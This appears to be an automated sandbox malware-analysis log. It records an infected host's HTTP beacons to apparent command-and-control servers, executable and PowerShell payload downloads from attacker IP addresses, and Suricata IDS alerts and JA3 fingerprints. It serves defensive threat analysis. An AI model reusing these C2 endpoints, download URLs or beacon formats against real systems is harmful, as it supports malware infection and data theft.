Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECGHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 2d 2d 0d 0a Data Ascii: ------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GIJDAFBKFIECBGCAKECG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /files/file1.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005627001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/k4pDgO.ps1 HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 32 38 30 34 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005628041&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 35 36 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1005637001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005642001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005643001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 11 Nov 2024 22:52:56 GMTIf-None-Match: "67328ac8-1bb200"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 2d 2d 0d 0a Data Ascii: ------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="build"mars------FIDHIEBAAKJDHIECAAFH--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 34 34 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005644031&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005645001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build"mars------ECGIIIDAKJDHJKFHIEBF--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDGHIIECGHDHJKFCAEGHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 2d 2d 0d 0a Data Ascii: ------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="build"mars------FIDGHIIECGHDHJKFCAEG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBAHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 2d 2d 0d 0a Data Ascii: ------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="build"mars------DGHIDAFCGIEHIEBFCFBA--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHDHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="build"mars------AKKEGHJDHDAFHIDHCFHD--
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49758 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49957 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50236 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50244 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50247 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50245 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50252 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50256 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50257 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50260 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50263 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50264 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50270 -> 23.210.122.61:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50278 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50273 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50276 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50282 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50285 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50286 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50290 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50292 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50293 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50294 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50296 -> 23.197.127.21:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50297 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50301 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50303 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50304 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50306 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50309 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50313 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50311 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50316 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50324 -> 23.197.127.21:443
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49732
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50254 -> 192.64.117.218:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50254 -> 192.64.117.218:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50265 -> 176.9.192.202:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50262 -> 176.9.192.202:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50269 -> 176.9.192.202:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50272 -> 176.9.192.202:443
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:50222
